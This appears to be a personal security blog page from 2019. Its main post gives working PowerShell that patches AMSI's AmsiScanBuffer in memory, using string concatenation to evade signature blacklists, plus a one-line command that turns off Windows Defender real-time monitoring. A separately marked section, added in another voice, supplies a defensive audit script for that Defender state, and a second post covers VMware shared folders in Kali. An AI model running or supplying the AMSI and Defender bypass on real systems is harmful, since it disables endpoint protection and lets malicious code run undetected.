Kazam

Just another vulnerable WordPress site

Month: September 2019

Bypassing Windows Defender and AMSI With Privileges

9/22/19

These steps assume you have access to PowerShell with admin rights. For the record, I’m not sure if this will work on a domain-joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it is not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistent and does require privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
);
}
"@
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel. The exact code in his blog post no longer works because it contains the literal string “AmsiScanBuffer”, but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink
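The registry change described above is exactly the kind of state a defender should be auditing for. The following PowerShell is an added example, not code from the original post: it reads back the current real-time protection preference, the persisted registry value, whether Tamper Protection is on, and the most recent Defender events that record real-time protection being disabled or reconfigured. The registry path and the event IDs (5001 and 5004) are assumptions drawn from my own knowledge of Defender rather than from this post, as is the `IsTamperProtected` property, which only exists on builds that ship Tamper Protection.

```powershell
# Added example (not from the original post): audit the state that
# "Set-MpPreference -DisableRealtimeMonitoring 1" leaves behind.
# Assumptions not on the page: the registry path below, the event IDs
# 5001 (real-time protection disabled) and 5004 (real-time protection
# configuration changed), and the IsTamperProtected status property.

function Get-RtpState {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # Set-MpPreference persists the flag here (assumed path); $null if never set.
    $regPath = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection'
    $regVal  = (Get-ItemProperty -Path $regPath -Name DisableRealtimeMonitoring `
                    -ErrorAction SilentlyContinue).DisableRealtimeMonitoring

    [pscustomobject]@{
        PreferenceDisabled   = [bool]$pref.DisableRealtimeMonitoring
        RegistryValue        = $regVal
        RealTimeProtectionOn = $status.RealTimeProtectionEnabled
        TamperProtected      = $status.IsTamperProtected   # assumed property
    }
}

function Get-RtpChangeEvents {
    param([int]$MaxEvents = 20)
    # Defender writes its own operational log; 5001/5004 are assumed IDs.
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Defender/Operational'
        Id      = 5001, 5004
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } }
}

$state = Get-RtpState
$state | Format-List

if (-not $state.RealTimeProtectionOn) {
    Write-Warning 'Real-time protection is off; check the events below for when it changed.'
}
if ($state.PreferenceDisabled -or $state.RegistryValue -eq 1) {
    Write-Warning 'DisableRealtimeMonitoring is persisted; it survives reboots until cleared.'
}
if (-not $state.TamperProtected) {
    Write-Warning 'Tamper Protection is off: one admin command can flip this setting.'
}

Get-RtpChangeEvents | Format-Table -AutoSize
```

Run it from an elevated PowerShell. With Tamper Protection enabled, the `Set-MpPreference` change above is rejected even for an administrator, which is the mitigation to reach for; where it cannot be turned on, forwarding the Defender operational log and alerting on the disable event is the fallback.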

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open-vm-tools open-vm-tools-desktop

Then make sure the folder is shared through VM -> Settings -> Options tab, and that sharing is set to “Always Enabled”.

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

© 2019 Kazam
